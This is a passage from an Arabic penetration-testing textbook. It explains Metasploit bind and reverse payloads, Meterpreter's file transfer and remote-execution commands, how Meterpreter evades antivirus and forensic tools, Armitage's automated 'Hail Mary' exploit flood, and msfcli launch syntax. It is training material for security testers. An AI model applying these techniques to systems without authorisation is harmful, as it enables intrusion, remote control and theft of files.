‫اﻟﺟﮭﺎز اﻟﮭدف‪ .‬اﻟﺟدول اﻟﺗﺎﻟﻲ ﺑﮫ ﻻﺋﺣﺔ ﻟﺑﻌض ‪ payloads‬اﻷﺳﺎﺳﯾﺔ‪ .‬ﯾرﺟﻰ اﻟرﺟوع إﻟﻰ وﺛﺎﺋﻖ ‪ Metasploit‬ﻟﻠﺣﺻول ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﻛﺎﻣﻠﺔ‪.‬‬
‫ﻧﺗذﻛر‪ ،‬واﺣدة ﻣن ﺻﻼﺣﯾﺎت ‪ Metasploit‬ھو اﻟﻘدرة ﻋﻠﻰ ﻣزج وﻣﻘﺎﺑﻠﺔ ‪ exploit‬و‪ .payloads‬ھذا ﯾوﻓر ﻟﻣﺧﺗﺑر اﻻﺧﺗراق ﻛﻣﯾﺔ ﻻ‬
‫ﺗﺻدق ﻣن اﻟﻣروﻧﺔ‪ ،‬ﻣﻣﺎ ﯾﺗﯾﺢ وظﺎﺋف ‪ Metasploit‬ﻟﻠﺗﻐﯾﯾر اﻋﺗﻣﺎدا ﻋﻠﻰ اﻟﻧﺗﯾﺟﺔ اﻟﻣرﺟوة‪ .‬ﻣن اﻟﻣﮭم أن ﺗﺻﺑﺢ ‪ payloads‬ﻣﺄﻟوﻓﺔ ﻣﻊ‬
‫ﻣﺧﺗﻠف اﻻﺣﺗﻣﺎﻻت اﻟﻣﺗﺎﺣﺔ ﻟك‪.‬‬

‫ﯾوﺟد اﻟﻌدﯾد ﻣن ھذه ‪ payloads‬ﻧﻔﺳﮭﺎ ﻷﻧظﻣﺔ اﻟﺗﺷﻐﯾل اﻻﺧرى ﻟﯾﻧﻛس‪ ،OS X ،BSD ،‬وﻏﯾرھﺎ ﻣن أﻧظﻣﺔ اﻟﺗﺷﻐﯾل‪ .‬ﻣرة أﺧرى‪ ،‬ﯾﻣﻛﻧك‬
‫اﻟﻌﺛور ﻋﻠﻰ اﻟﺗﻔﺎﺻﯾل اﻟﻛﺎﻣﻠﺔ ﻣن ﺧﻼل ﻣراﺟﻌﺔ اﻟوﺛﺎﺋﻖ ‪ Metasploit‬ﻋن ﻛﺛب‪ .‬ھﻧﺎك ﺷﻲء اﺧر ﯾﺳﺑب اﻻرﺗﺑﺎك ﻟﻛﺛﯾر ﻣن اﻟﻧﺎس ھو اﻟﻔرق‬
‫ﺑﯾن ‪ payloads‬ﻣﻣﺎﺛﻠﺔ ﻣﺛل ]‪ [windows/meterpreter/bind_tcp‬و ]‪[windows/meterpreter/reverse_tcp‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪304‬‬

‫اﻟﻔرق اﻟرﺋﯾﺳﻲ ﺑﯾن ھذﯾن ھو اﺗﺟﺎه اﻻﺗﺻﺎل ﺑﻌد اﺧﺗراق اﻟﻧظﺎم اﻟﮭدف‪.‬‬
‫‪ -‬ﻓﻲ ‪ ،bind payload‬ﻧﺣن ﻓﻲ وﻗت واﺣد ﻧﻘوم ﺑﺈرﺳﺎل ‪ exploit‬وإﺟراء‬
‫اﺗﺻﺎل إﻟﻰ اﻟﮭدف ﻣن اﻟﺟﮭﺎز‪ .‬ﻓﻲ ھذا اﻟﻣﺛﺎل‪ ،‬اﻟﻣﮭﺎﺟم ﯾرﺳل ‪exploit‬‬
‫ﻟﻠﮭدف واﻟﮭدف ﯾﻧﺗظر اﻻﺗﺻﺎل ان ﯾﺄﺗﻲ اﻟﯾﮫ ﺑﻌد إرﺳﺎل ‪ ،exploit‬وآﻟﺔ‬
‫اﻟﻣﮭﺎﺟم ﺗرﺗﺑط ﺑﺎﻟﮭدف‪.‬‬
‫‪ -‬ﻓﻲ ‪ ،reverse payload‬آﻟﺔ اﻟﻣﮭﺎﺟم ﺗرﺳل ‪ exploit‬وﻟﻛن ﯾﻔرض ﻋﻠﻰ‬
‫اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف اﻻﺗﺻﺎل ﻣرة أﺧرى إﻟﻰ اﻟﻣﮭﺎﺟم‪ .‬ﻓﻲ ھذا اﻟﻧوع ﻣن‬
‫اﻟﮭﺟوم‪ ،‬ﺑدﻻ ﻣن اﻻﻧﺗظﺎر ﻋن اﺗﺻﺎل وارد ﻋﻠﻰ ﻣﻧﻔذ ﻣﺣدد أو ﺧدﻣﺔ‪ ،‬ﻓﺎن‬
‫اﻟﺟﮭﺎز اﻟﮭدف ﯾﺟﻌل اﺗﺻﺎل ﻣرة أﺧرى إﻟﻰ اﻟﻣﮭﺎﺟم‪.‬‬

‫اﺧر ﻣوﺿوع ﻋن ‪ Metasploit‬ﺣﯾث ﺳوف ﻧﺗطرق ﻟﻣﻧﺎﻗﺷﺔ ‪ Metasploit‬ﺑﺎﻟﻛﺎﻣل ﻻﺣﻘﺎ ھو‪ Meterpreter . Meterpreter‬او‬
‫‪ Meta-Interpreter‬ھﻲ أداة ﻗوﯾﺔ وﻣرﻧﺔ اﻟﺗﻲ ﺳوف ﺗﺣﺗﺎج ﺗﻌﻠﻣﮭﺎ إذا ﻛﻧت ﺗرﯾد إﺗﻘﺎن ﻓن‪ ،Meterpreter . Metasploit‬ھﻲ‬
‫‪ payload‬ﻣﺗﺎﺣﺔ ﻓﻲ ‪ Metasploit‬اﻟذي ﯾﻌطﻲ اﻟﻣﮭﺎﺟﻣﯾن ﻗذﯾﻔﺔ اﻟﻘﯾﺎدة اﻟﻘوﯾﺔ اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠﺗﻔﺎﻋل ﻣﻊ ھدﻓﮭم‪ .‬آﺧر ﻣﯾزة ﻛﺑﯾرة ﻟل‬
‫‪Meterpreter‬ھو ﺣﻘﯾﻘﺔ أﻧﮫ ﯾﻌﻣل ﺑﺎﻟﻛﺎﻣل ﻓﻲ اﻟذاﻛرة وﻻ ﯾﺳﺗﺧدم اﻟﻘرص اﻟﺻﻠب أﺑدا‪ .‬ﯾوﻓر ھذا اﻟﺗﻛﺗﯾك طﺑﻘﺔ ﻣن اﻟﺷﺑﺢ اﻟﺗﻲ ﺗﺳﺎﻋد ﻋﻠﻰ‬
‫اﻟﺗﮭرب ﻣن اﻟﻌدﯾد ﻣن أﻧظﻣﺔ اﻟﺣﻣﺎﯾﺔ ﻣن اﻟﻔﯾروﺳﺎت وﯾﮭرب ﻣن ﺑﻌض أدوات اﻟطب اﻟﺷرﻋﻲ‪.‬‬
‫وظﺎﺋف ‪ Meterpreter‬ﺑطرﯾﻘﺔ ﻣﺷﺎﺑﮭﺔ إﻟﻰ ‪ Windows cmd.exe‬أو ‪ .Linux /bin/sh‬ﺑﻣﺟرد ﺗﺛﺑﯾﺗﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﺿﺣﯾﺔ‪ ،‬ﻓﺄﻧﮭﺎ ﺗﺗﯾﺢ‬
‫ﻟﻠﻣﮭﺎﺟم اﻟﺗﻔﺎﻋل ﻣﻊ وﺗﻧﻔﯾذ اﻷواﻣر ﻋﻠﻰ اﻟﮭدف ﻛﻣﺎ ﻟو ﻛﺎن اﻟﻣﮭﺎﺟم ﯾﺟﻠس ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺣﻠﻲ اﻟﺧﺎص ﺑﮫ‪ .‬ﻣن اﻟﻣﮭم ﺟدا أن ﻧﻔﮭم أن ﺳﯾﺗم‬
‫ﺗﺷﻐﯾل ‪ Meterpreter‬ﻣﻊ اﻻﻣﺗﯾﺎزات اﻟﻣﻘﺗرﻧﺔ ﺑﺎﻟﺑرﻧﺎﻣﺞ اﻟذي ﺗم اﺧﺗراﻗﮭﺎ‪.‬‬
‫‪ Meterpreter‬ﻟدﯾﮭﺎ اﻟﻌدﯾد ﻣن اﻟﻣﯾزات اﻟراﺋﻌﺔ اﻟﺗﻲ ﺑﻧﯾت ﻓﯾﮭﺎ اﻓﺗراﺿﯾﺎ‪ .‬ﺗﺷﻣل اﻟوظﺎﺋف اﻷﺳﺎﺳﯾﺔ اﻷﻣر " ‪ ،“ migrate‬وھو أﻣر ﻣﻔﯾد‬
‫ﻟﺗﺣرﯾك اﻟﺧﺎدم ﻟﻌﻣﻠﯾﺔ أﺧرى‪ .‬وھذا ﻣﮭم ﺟدت‪ ،‬ﻓﻲ ﺣﺎل ﺗم إﯾﻘﺎف اﻟﺧدﻣﺔ اﻟﺗﻲ ﺗﻌﺗﺑر ﻧﻘطﺔ ﺿﻌف واﻟﺗﻲ ﺳف ﺗﮭﺎﺟﻣﮭﺎ‪ .‬وظﯾﻔﺔ ﻣﻔﯾدة آﺧري ھو‬
‫اﻻﻣر "‪ " cat‬اﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻌرض ﻣﺣﺗوﯾﺎت اﻟﻣﻠف ﻋﻠﻰ اﻟﺷﺎﺷﺔ اﻟﻣﺣﻠﯾﺔ‪ .‬وھذا ﻣﻔﯾد ﻻﺳﺗﻌراض اﻟﻣﻠﻔﺎت اﻟﻣﺧﺗﻠﻔﺔ ﻋﻠﻰ اﻟﮭدف‪ .‬ﯾﺳﻣﺢ‬
‫اﻻﻣر " ‪ " download‬ﻟﺳﺣب ﻣﻠف أو دﻟﯾل ﻣن اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪ ،‬ﻣﻣﺎ ﯾﺟﻌل ﻧﺳﺧﺔ ﻣﺣﻠﯾﺔ ﻋﻠﻰ ﺟﮭﺎز اﻟﻣﮭﺎﺟم‪ .‬ﯾﻣﻛن اﺳﺗﺧدام اﻷﻣر "‬
‫‪ " upload‬ﻟﻧﻘل اﻟﻣﻠﻔﺎت ﻣن ﺟﮭﺎز اﻟﻣﮭﺎﺟم إﻟﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪ .‬ﯾﻣﻛن اﺳﺗﺧدام اﻷﻣر " ‪ " edit‬ﻹﺟراء ﺗﻐﯾﯾرات ﻋﻠﻰ ﻣﻠﻔﺎت ﺑﺳﯾطﺔ‪ .‬ﯾﻣﻛن‬
‫اﺳﺗﺧدام اﻻﻣر " ‪ " execute‬ﻹﺻدار أﻣر‪ ،‬وأﻧﮭﺎ ﺗﻌﻣل ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﺑﻌﯾد‪ ،‬ﻓﻲ ﺣﯾن أن اﻻﻣر " ‪ "kill‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟوﻗف اﻟﻌﻣﻠﯾﺔ‪.‬‬
‫اﻷواﻣر اﻟﺗﺎﻟﯾﺔ ھﻲ أﯾﺿﺎ ﻣﻔﯾدة وﺗوﻓر ﻧﻔس اﻟوظﯾﻔﺔ ﺑﺎﻟﺿﺑط ﻛﻣﺎ ﯾﻔﻌﻠون ﻋﻠﻰ ﺟﮭﺎز ﻟﯾﻧﻛس اﻟﻌﺎدي‪shutdown " ،“ ps " ،“ ls" ،“ cd " :‬‬
‫“‪ ،“ pwd " ،“ mkdir " ،‬و " ‪.“ ifconfig‬‬
‫ﻛﻣﺎ ﺗرون‪ ،‬اﻟﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ ‪ Meterpreter‬ھﻲ واﺣدة ﻣن أﻛﺛر وﺳﺎﺋل ﻗوﯾﺔ وﻣرﻧﺔ‪ ،‬واﻟﺗﺧﻔﻲ ﯾﻣﻛن ﻷﺣد اﻟﻣﮭﺎﺟﻣﯾن اﻟﺗﻔﺎﻋل ﻣﻊ اﻟﮭدف‪.‬‬
‫أﻧﮭﺎ ﺗﺳﺗﺣﻖ وﻗﺗك ﻟﻣﻌرﻓﺔ ﻛﯾﻔﯾﺔ اﺳﺗﺧدام ھذه اﻷداة ﻓﻲ ﻣﺗﻧﺎول ﯾدي‪ .‬ﺳﻧﻌود إﻟﻰ ‪ Meterpreter‬ﻋﻧدﻣﺎ ﻧﻧﺎﻗش ‪ post exploitation‬ﻓﻲ‬
‫اﻟﺧطوة ‪.4‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪305‬‬

‫‪MASTERING ARMITAGE, THE GRAPHICAL MANAGEMENT TOOL FOR METASPLOIT‬‬

‫إﺻدارات أﺣدث ﻣن ‪ Metasploit‬ذات وﺟﮫ رﺳوﻣﯾﮫ ﺗدﻋﻰ ارﻣﯾﺗﺎج )‪ .(Armitage‬ﻓﮭم أرﻣﯾﺗﺎج ﻣﮭم ﻷﻧﮫ ﯾﺟﻌل ﻓﻲ ﻧﮭﺎﯾﺔ اﻟﻣطﺎف‬
‫اﺳﺗﺧداﻣك ﻟل‪ Metasploit‬أﺳﮭل ﻋن طرﯾﻖ ﺗوﻓﯾر اﻟﻣﻌﻠوﻣﺎت ﻟك ﺑﺻرﯾﺎ‪ .‬أﻧﮫ ﯾﺷﻣل وﺣدة اﻟﺗﺣﻛم ‪ ،Metasploit‬وﺑﺎﺳﺗﺧدام ﻗدرات‬
‫اﻟﺟدوﻟﺔ ﻟﮭﺎ‪ ،‬وﯾﺳﻣﺢ ﻟك أن ﺗرى أﻛﺛر ﻣن وﺣدة اﻟﺗﺣﻛم ‪ Metasploit‬أو ﺟﻠﺳﺔ ‪ Meterpreter‬ﻓﻲ وﻗت واﺣد‪.‬‬
‫ﯾﻣﻛﻧك ﻗراءة اﻟﻣزﯾد ﻋن ھذه اﻷداة ﺑزﯾﺎرة اﻟﻣوﻗﻊ ‪http://www.fastandeasyhacking.com‬‬
‫‪Start | Kali Linux | Exploitation Tools | Network Exploitation Tools | Armitage‬‬

‫‪ -1‬ﻋﻠﻰ ﺷﺎﺷﺔ ﺗﺳﺟﯾل اﻟدﺧول ﻟﻸرﻣﯾﺗﺎج‪ ،‬اﻧﻘر ﻋﻠﻰ زر ‪:connect‬‬

‫‪ -2‬ﻗد ﯾﺳﺗﻐرق ارﻣﯾﺗﺎج ﺑﻌض اﻟوﻗت ﻟﻼﺗﺻﺎل ﺑﺎﻠ ‪ .Metasploit‬ﻓﻲ ﺣﯾن أن ھذا ﯾﺣدث‪ ،‬ﻗد ﺗرى ﻧﺎﻓذة اﻹﻋﻼم اﻟﺗﺎﻟﻲ‪ .‬ﻻ ﺗﻧدھش‪.‬‬
‫وﺳوف ﺗزول ﺑﻣﺟرد ان ﯾﻛون أرﻣﯾﺗﺎج ﻗﺎدرا ﻋﻠﻰ اﻻﺗﺻﺎل‪ .‬ﻓﻲ اﻟﺷﺎه ذات اﻟﻌﻧوان ?‪ ،Start Metasploit‬اﻧﻘر ﻋﻠﻰ ‪:yes‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪306‬‬

‫‪ -3‬ﺛم ﯾﺗم ﺗﻘدﯾﻣك اﻟﻰ اﻟﺷﺎﺷﺔ ارﻣﯾﺗﺎج اﻟرﺋﯾﺳﯾﺔ‪ .‬وﻧﺣن اﻵن ﻓﻲ ﻣﻧﺎﻗﺷﺔ اﻟﻣﻧﺎطﻖ اﻟﺛﻼث اﻟﺗﺎﻟﯾﺔ ﻋﻠﻰ اﻟﺷﺎﺷﺔ اﻟرﺋﯾﺳﯾﺔ )وﺿﻊ ﻋﻼﻣﺔ ‪،A.‬‬
‫‪ G ،.B‬ﻓﻲ اﻟﺻورة اﻟﺗﺎﻟﯾﺔ(‪:‬‬
‫‪ :A‬ﺗﻌرض ھذه اﻟﻣﻧطﻘﺔ اﻟوﺣدات اﻟﻣﻌدة ﺳﺎﺑﻘﺎ‪ .‬ﯾﻣﻛﻧك اﻟﺑﺣث ﻋن اﻟوﺣدات ﺑﺎﺳﺗﺧدام ‪ SPACE‬اﻟﻣﺗوﻓرة أدﻧﺎ ﻗﺎﺋﻣﺔ اﻟوﺣدات اﻟﻧﻣطﯾﺔ‪.‬‬
‫‪ :B‬ﺗﻌرض ھذه اﻟﻣﻧطﻘﺔ أھداﻓك اﻟﻧﺷطﺔ اﻟﺗﻲ ﻧﺣن ﻗﺎدرون ﻋﻠﻰ ﺗﺷﻐﯾل ‪ exploit‬اﻟﺗﻲ ﻟدﯾﻧﺎ ﺿد اﻟﮭدف‪.‬‬
‫‪ :C‬ﺗﻌرض ھذه اﻟﻣﻧطﻘﺔ اﻟﻌدﯾد ﻣن ‪ Metasploit‬ﻟﻠﺳﻣﺎح ﻟﻠﻌدﯾد ﻣن ‪ Meterpreter‬أو ﺟﻠﺳﺎت ‪ CONSOLE‬ﻟﯾﺗم ﺗﺷﻐﯾﻠﮭﺎ وﻋرﺿﮭﺎ‬
‫ﻓﻲ وﻗت واﺣد‪.‬‬

‫طرﯾﻘﺔ ﺑدﯾﻠﺔ ﻹطﻼق ارﻣﯾﺗﺎج ھو ﻛﺗﺎﺑﺔ اﻷﻣر ‪ armitage‬ﻓﻲ إطﺎر اﻟﺗرﻣﻧﺎل‪.‬‬

‫ﻟﻣﺎذا ﻧﺗﻌرف ﻋﻠﻰ ﺧﻣس أدوات وﻋﻧدﻧﺎ اداه واﺣده ﻓﻘط ﺗﻌﻣل ﻛل ھذا؟‬

‫ﻗﺑل أن ﻧﺗﻣﻛن ﻣن اﻟﺑدء ﻓﻲ اﺳﺗﺧدام ‪ exploit‬ﻋﻠﻰ ھدﻓﻧﺎ‪ ،‬ﻓﻧﺣن ﺑﺣﺎﺟﺔ إﻟﻰ اﻟﻘﯾﺎم ﻗﻠﯾﻼ ﺑﺑﻌض اﻻﻋﻣﺎل‪ .‬أوﻻ‪ ،‬ﻧﺳﺗﺧدم ارﻣﯾﺗﺎج ﻟﻔﺣص اﻟﺷﺑﻛﺔ‬
‫اﻟﻣﺣﻠﯾﺔ اﻟﺧﺎﺻﺔ ﺑﻧﺎ وﺗﺣدﯾد أي ﻣن اﻷھداف اﻟﺣﯾﺔ‪ .‬ﻟﺗﺷﻐﯾل اﻟﻔﺣص‪ ،‬اﻧﻘر ﻋﻠﻰ "‪ "hosts‬اﻟﺧﯾﺎر اﻟﻣوﺟود ﻓﻲ اﻟﻘﺎﺋﻣﺔ وﻣن ﺛم اﺧﺗﯾﺎر "‬
‫)‪ " Quick Scan (OS detect‬ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺻورة اﻟﺗﺎﻟﯾﺔ‪.‬‬

‫ﺑﻌد اﺧﺗﯾﺎر ")‪ " Quick Scan (OS detect‬ﺳوف ﺗﺣﺗﺎج إﻟﻰ ﺗوﻓﯾر ﻋﻧوان ‪ IP‬ﺻﺎﻟﺢ أو ﻧطﺎق ‪ IP‬ﻟﻌﻣﻠﯾﺔ اﻟﻔﺣص‪ .‬ﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن‬
‫اﻟﻔﺣص‪ ،‬ﻓﺈن أي ﻣن اﻷھداف اﻟﻣﺣددة ﺳوف ﺗظﮭر ﻋﻠﻰ اﻟﺷﺎﺷﺔ ﻓﻲ ﻣﺳﺎﺣﺔ اﻟﻌﻣل‪ .‬ﯾﻘدم اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻣﺛﺎل ﻟﮭذا اﻟﻧﺎﺗﺞ‪ .‬وﺳوف ﯾظﮭر ﻟك‬
‫رﺳﺎﻟﺔ ﺗﻌطﯾك ﺗﻌﻠﯾﻣﺎت ﺣول إﯾﺟﺎد ‪."Use Attacks → Find Attacks " exploit‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪307‬‬

‫طﺎﻟﻣﺎ ﺣدد ارﻣﯾﺗﺎج ھدﻓﺎ ﻣﺣﺗﻣﻼ واﺣد ﻋﻠﻰ اﻷﻗل‪ ،‬ﻓﺈﻧك ﻋﻠﻰ اﺳﺗﻌداد ﻹطﻼق اﻟﻌﻧﺎن ﻟﺳﯾل ﻣن ‪ .exploit‬ﻹﻧﺟﺎز ھذا‪ ،‬ﺑﺑﺳﺎطﺔ اﻧﻘر ﻋﻠﻰ زر‬
‫"‪ "Attacks‬ﻣن اﻟﻘﺎﺋﻣﺔ اﻟﺗﻲ ﺗﻠﯾﮭﺎ "‪ " Hail Mary‬ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪:‬‬

‫ﺑﺎﻟﻧﻘر ﻋﻠﻰ اﻟﺧﯾﺎر اﻟﺳﻼم ‪ Hail Mary‬ﻓﺎﻧﮫ ﯾﺟﻌل أرﻣﯾﺗﺎج إﻟﻰ ارﺳﺎل طوﻓﺎن ﻣن ‪ exploit‬ﺿد اﻟﮭدف‪ .‬ﺳﺗﺑدأ أداة اﻟﺗﺷﻐﯾل وإﺻدار‬
‫اﻷواﻣر ﺗﻠﻘﺎﺋﯾﺎ‪ .‬ﻗد ﺗﺳﺗﻐرق ھذه اﻟﻌﻣﻠﯾﺔ ﻋدة دﻗﺎﺋﻖ ﻟﻺﺗﻣﺎم‪ .‬ﯾﻣﻛﻧك ﻣﺷﺎھدة ﺗﻘدم ﻟﻠﺑرﻧﺎﻣﺞ ﻓﻲ اﻟﻧﺻف اﻟﺳﻔﻠﻲ ﻣن اﻟﻧﺎﻓذة‪ .‬ان ارﻣﯾﺗﺎج ﺳوف ﯾﻘدم‬
‫ﻟك اﯾﺿﺎ ﺷرﯾط اﻟﺗﻘدم )‪ (progress bar‬ﻟﺗﻣﻛﻧك ﻣن ﻣﻌرﻓﺔ ﻣدى طول اﻟﻌﻣﻠﯾﺔ وﺗﻘدﻣﮭﺎ‪ .‬ﻟﻧﻛون واﺿﺣﯾن‪ ،‬ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﻓﺎن ارﻣﯾﺗﺎج ﯾﻘوم‬
‫ﺑرﺑط ﻧﺗﺎﺋﺞ ‪ Nmap‬ﻣﻊ ‪ exploit‬ﻓﻲ ‪ Metasploit‬وﯾرﺳل ﻛل ‪ exploit‬ذات اﻟﺻﻠﺔ ﺑﺎﻟﮭدف اﻧﺗﺑﮫ ﺟﯾدا ﻟواﺟﮭﺔ اﻟﻣﺳﺗﺧدم اﻟرﺳوﻣﯾﺔ اﻟﺗﻲ‬
‫ﺗﻣﺛل اﻟﮭدف اﻟﺧﺎص ﺑك ﻓﻲ ﺷﺎﺷﺔ أرﻣﯾﺗﺎج؛ إذا ﻛﺎن اﻟﮭدف أﺻﺑﺢ ﻣﺣدد ﺑﺿوء اﺣﻣر ﻋﻠﻰ ﺷﻛل ﺑرق‪ ،‬ﻓﮭذا ﯾﻌﻧﻰ ان أرﻣﯾﺗﺎج ﻧﺟﺢ ﻓﻲ اﺧﺗراق‬
‫اﻟﮭدف‪ .‬وﯾﺑﯾن اﻟﺷﻛل اﻟﺗﺎﻟﻲ ﻣﺛﺎل ﻋﻠﻰ اﺧﺗراق اﻟﮭدف ﺑﺛﻼث ﺷل ﻋن ﺑﻌد‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪308‬‬

‫ﻋﻧدﻣﺎ اﺳﺗﻧﻔﺎذ أرﻣﯾﺗﺎج اﻣداداﺗﮭﺎ ﻣن ‪ exploit‬اﻟﻣﺣﺗﻣﻠﺔ‪ ،‬ﻓﺎﻧﮫ ﯾﻣﻛﻧك ﻋرض أي او ﺟﻣﯾﻊ اﻟﺷل اﻟﺗﻲ ﺗم اﻟﺣﺻول ﻋﻠﯾﮭﺎ ﻋن طرﯾﻖ اﻟﻧﻘر ﺑﺎﻟزر‬
‫اﻷﯾﻣن ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﮭدف ﻛﻣﺎ ھو ﻣﺑﯾن ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪:‬‬

‫ﻓﻲ ھذه اﻟﻣرﺣﻠﺔ ﯾﻣﻛﻧك اﻟﺗﻔﺎﻋل ﻣﻊ ھذا اﻟﮭدف‪ ،‬وﺗﺣﻣﯾل اﻟﺑراﻣﺞ واﻟﻣواد إﻟﻰ اﻟﮭدف‪ ،‬أو أداء ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن ﻏﯾرھﺎ ﻣن اﻟﮭﺟﻣﺎت‪.‬‬
‫ﻟﻠﺣﺻول ﻋﻠﻰ ﻗذﯾﻔﺔ ﺷل وﺗﺷﻐﯾل اﻷواﻣر ﻋﻠﻰ اﻟﮭدف اﻟﺑﻌﯾد‪ ،‬اﻧﻘر ﻓوق اﻟﺧﯾﺎر "‪ ." interact‬ھذا ﺳﯾﺳﻣﺢ ﻟك ﻹﺻدار وﺗﺷﻐﯾل اﻷواﻣر ﻓﻲ‬
‫إطﺎر اﻟﺗرﻣﻧﺎل اﻟﺧﺎص ارﻣﯾﺗﺎج‪ .‬ﺟﻣﯾﻊ أواﻣر اﻟﺗﺷﻐﯾل ﺷوف ﯾﺗم ﺗﻧﻔﯾذھﺎ ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﺑﻌﯾد ﻛﻣﺎ ﻟو ﻛﺎن ﻟدﯾك اﻟوﺻول اﻟﻣﺎدي وﺗﺗم اﻟﻛﺗﺎﺑﺔ ﻓﻲ‬
‫اﻟﺗرﻣﻧﺎل ﻋﻠﻰ اﻟﮭدف‪.‬‬

‫)‪MASTERING THE METASPLOIT CLI (MSFCLI‬‬

‫ﻓﻲ ھذه اﻟﺟزء‪ ،‬ﺳوف ﻧﺳﺗﻛﺷف)‪ Metasploit . Metasploit CLI (MSFCLI‬ﯾﺗطﻠب اﺳﺗﺧدام واﺟﮭﺔ ﻣن أﺟل أداء ﻣﮭﺎﻣﮫ‪.‬‬
‫و ‪MSFCLI‬ھو ﻣﺛﺎل ﻟﮭذه اﻟواﺟﮭﺔ‪ .‬ﺑل ھو واﺟﮭﺔ ﺟﯾدة ﻟﺗﻌﻠم ‪ Metasploit‬أو اﺧﺗﺑﺎر‪/‬ﻛﺗﺎﺑﺔ ‪ exploit‬ﺟدﯾد‪ .‬ﺑل ﯾﻌﻣل أﯾﺿﺎ ﺑﺷﻛل ﺟﯾد ﻓﻲ‬
‫ﺣﺎﻟﺔ اﺳﺗﺧدام اﻟﺳﻛرﯾﺑت وﺗطﺑﯾﻖ اﻟﻣﮭﺎم اﻷﺳﺎﺳﯾﺔ ﺑطرﯾﻘﮫ اﻟﯾﮫ‪.‬‬
‫اﻟﮭدف اﻟرﺋﯾﺳﻲ ﻣﻊ اﺳﺗﺧدام ‪ MSFCLI‬ھو أﻧﮫ ﯾﻣﻛﻧك ﻓﻘط ﻓﺗﺢ ﺷل ﻓﻲ ﻛل ﻣرة‪ .‬ﺳﺗﻼﺣظ أﯾﺿﺎ اﺳﺗﻛﺷﺎف ﺑﻌض اﻷواﻣر ﻟدﯾﻧﺎ أﻧﮫ ﯾﻌﻣل أﺑطﺄ‬
‫ﻗﻠﯾﻼ وھﻲ أﻛﺛر ﺗﻌﻘﯾدا ﺑﻘﻠﯾل ﻣن ‪ .MSFCONSOLE‬أﺧﯾرا‪ ،‬ﻋﻠﯾك أن ﺗﻌرف ﺑﺎﻟﺿﺑط ‪ exploit‬اﻟذي ﺗرﻏب ﻓﻲ ﺗﺷﻐﯾل ﻣن أﺟل اﺳﺗﺧدام‬
‫‪ .MSFCLI‬وھذا ﯾﻣﻛن أن ﯾﺟﻌل ﻣن اﻟﺻﻌب ﻗﻠﯾﻼ ﻻﺧﺗﺑﺎر اﻻﺧﺗراق اﻟﺟدد اﻟذﯾن ﻟﯾﺳوا ﻋﻠﻰ دراﯾﺔ ﻣﻊ ﻗﺎﺋﻣﺔ ‪ Metasploit‬ﻣن ‪.exploit‬‬
‫ﺑﻌض اﻷواﻣر ل‪ MSFCLI‬ھﻲ‪:‬‬
‫‪ :msfcli -1‬ھذا اﻻﻣر ﯾﻘوم ﺑﺗﺣﻣﯾل ﻗﺎﺋﻣﺔ ﺑﺟﻣﯾﻊ ‪ exploit‬اﻟﻣﺗوﻓرة ﻓﻲ ﻣﺗﻧﺎول ‪.MSFCLI‬‬
‫‪ :msfcli -h -2‬ﯾﻌرض ﻣﻠف ﻣﺳﺎﻋدة ‪.MSFCLI‬‬
‫‪ :msfcli [PATH TO EXPLOIT] [options = value] -3‬ھذه اﻟﺻﯾﻐﺔ ﻣن أﺟل ﺷن ‪.exploit‬‬

‫ﺑدء ﺗﺷﻐﯾل )‪ Metasploit CLI (MSFCLI‬ﺑﺎﺳﺗﺧدام اﻷﻣر اﻟﺗﺎﻟﻲ‪ .‬ﯾرﺟﻰ اﻟﺗﺣﻠﻲ ﺑﺎﻟﺻﺑر ﻷن ھذا ﻗد ﯾﺳﺗﻐرق ﻗﻠﯾﻼ ﻣن اﻟوﻗت‬ ‫‪-‬‬
‫اﻋﺗﻣﺎدا ﻋﻠﻰ ﺳرﻋﺔ اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ﻻﺣظ أﯾﺿﺎ أﻧﮫ ﻋﻧد ﺗﺣﻣﯾل ‪ ،MSFCLI‬ﻓﺎن ﻗﺎﺋﻣﺔ ﻣن ‪ exploit‬اﻟﻣﺗﺎﺣﺔ ﺳوف ﯾﺗم‬
‫ﻋرﺿﮭﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪309‬‬

